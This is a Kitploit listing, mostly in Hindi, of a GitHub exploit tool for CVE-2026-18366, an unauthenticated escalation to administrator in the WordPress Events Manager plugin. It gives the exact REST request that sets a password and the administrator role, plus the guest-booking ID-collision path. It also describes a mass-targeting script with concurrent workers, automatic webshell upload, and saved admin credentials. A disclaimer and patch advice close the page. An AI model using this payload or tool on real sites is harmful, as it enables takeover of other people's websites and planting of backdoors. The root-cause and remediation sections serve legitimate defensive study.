Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - बिना प्रमाणीकरण के व्यवस्थापक तक विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2026-18366
विशेषाधिकार वृद्धिवेब भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषण
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - बिना प्रमाणीकरण के व्यवस्थापक तक विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
4 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-18366

Events Manager < 7.4.1 - बिना प्रमाणीकरण के एडमिनिस्ट्रेटर तक प्रिविलेज एस्केलेशन

CVE CVSS WordPress

टाइपिंग SVG


🔗 अपडेट रहें

Telegram

नवीनतम zero-day, एक्सप्लॉइट और सुरक्षा अनुसंधान के लिए

Telegram Channel


📋 भेद्यता अवलोकन


🔍 तकनीकी विवरण

मूल कारण विश्लेषण

यह भेद्यता classes/em-archetypes.php के अंदर EM\Archetypes::map_meta_cap में मौजूद है। प्लगइन अपनी क्षमता मैपिंग को गलत तरीके से स्कोप करता है:

  1. किसी भी ऑब्जेक्ट ID को पोस्ट ID के रूप में मानना
  2. यदि पोस्ट event या location CPT है, तो $caps = [] को खाली कर देना
  3. edit_user, delete_user, या promote_user के लिए क्षमताओं को कभी दोबारा नहीं भरना
  4. खाली caps → has_cap() true लौटाता है, जिसमें यूज़र 0 (अतिथि) भी शामिल है

हमला वेक्टर

root@kitploit:~
POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

शर्त: {id} को किसी event या location CPT के wp_posts.ID के बराबर होना चाहिए।

⚠️ बिना प्रमाणीकरण वाला REST किसी nonce की आवश्यकता नहीं रखता (कोई लॉग-इन कुकी नहीं)।

अतिथि बुकिंग शोषण

अतिथि बुकिंग (डिफ़ॉल्ट रूप से dbem_bookings_anonymous=1) वास्तविक WP उपयोगकर्ता बनाती है, जिससे कॉलिज़न फोर्सिंग संभव होती है। बुकिंग nonce इवेंट फ़ॉर्म पर सार्वजनिक रूप से उपलब्ध होता है।


🚀 उपयोग

आवश्यकताएँ

root@kitploit:~
pip install aiohttp

त्वरित आरंभ

root@kitploit:~
python CVE-2026-18366.py

स्क्रिप्ट निम्न के लिए पूछेगी:

  • list → टारगेट सूची फ़ाइल का पथ (डिफ़ॉल्ट: list.txt)
  • speed → समवर्ती वर्कर्स की संख्या (डिफ़ॉल्ट: 10)

कमांड लाइन विकल्प

root@kitploit:~
python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
विकल्पविवरण
-l, --listटारगेट URL वाली फ़ाइल का पथ
-s, --speedसमवर्ती वर्कर्स की संख्या (1-200)
--timeoutअनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 20)

टारगेट सूची प्रारूप

एक list.txt फ़ाइल बनाएँ जिसमें हर पंक्ति में एक टारगेट हो:

root@kitploit:~
https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 आउटपुट

कंसोल आउटपुट

root@kitploit:~
[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

परिणाम फ़ाइल

सफल कॉम्प्रोमाइज़ adminS.txt में सहेजे जाते हैं:

root@kitploit:~
https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 शोषण कार्यप्रवाह

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ विशेषताएँ

  • एसिंक्रोनस आर्किटेक्चर → उच्च-प्रदर्शन समवर्ती स्कैनिंग
  • दोहरे हमले पथ → ID कॉलिज़न + अतिथि बुकिंग शोषण
  • स्वचालित शेल अपलोड → प्लगइन/थीम वेबशेल तैनाती
  • संस्करण पहचान → स्वचालित रूप से संवेदनशील संस्करण की पहचान
  • स्मार्ट यूज़रनेम एन्यूम → कई एन्यूमरेशन तकनीकें
  • लॉगिन सत्यापन → कुकी + XML-RPC मान्यता
  • प्रिविलेज एस्केलेशन → स्वचालित रूप से एडमिनिस्ट्रेटर बनाना

📁 फ़ाइल संरचना

root@kitploit:~
├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ अस्वीकरण

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║                                                                  ║
║  • Only use on systems you own or have explicit permission      ║
║  • Unauthorized access to computer systems is ILLEGAL           ║
║  • The author is NOT responsible for any misuse or damage       ║
║  • By using this tool, you agree to these terms                 ║
║                                                                  ║
║  Use responsibly. Stay ethical. Respect the law.                ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ निवारण

यदि आप वर्डप्रेस एडमिनिस्ट्रेटर हैं:

  1. Events Manager को संस्करण 7.4.1 या उसके बाद के संस्करण में अपडेट करें
  2. अनधिकृत परिवर्तनों के लिए उपयोगकर्ता खातों की ऑडिट करें
  3. संदिग्ध REST API गतिविधि के लिए एक्सेस लॉग की समीक्षा करें
  4. दुर्भावनापूर्ण अनुरोधों को फ़िल्टर करने के लिए WAF नियम लागू करें

👤 लेखक

Nxploited (Khaled Alenzi)

Telegram


सुरक्षा अनुसंधान • एथिकल हैकिंग • ज़ीरो-डे खोज

टूल डाउनलोड करें
विशेषताविवरण
CVE IDCVE-2026-18366
गंभीरता🔴 क्रिटिकल (CVSS 9.8)
प्लगइनवर्डप्रेस के लिए Events Manager
प्रभावित संस्करण< 7.4.1
भेद्यता प्रकारबिना प्रमाणीकरण के प्रिविलेज एस्केलेशन
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यककोई नहीं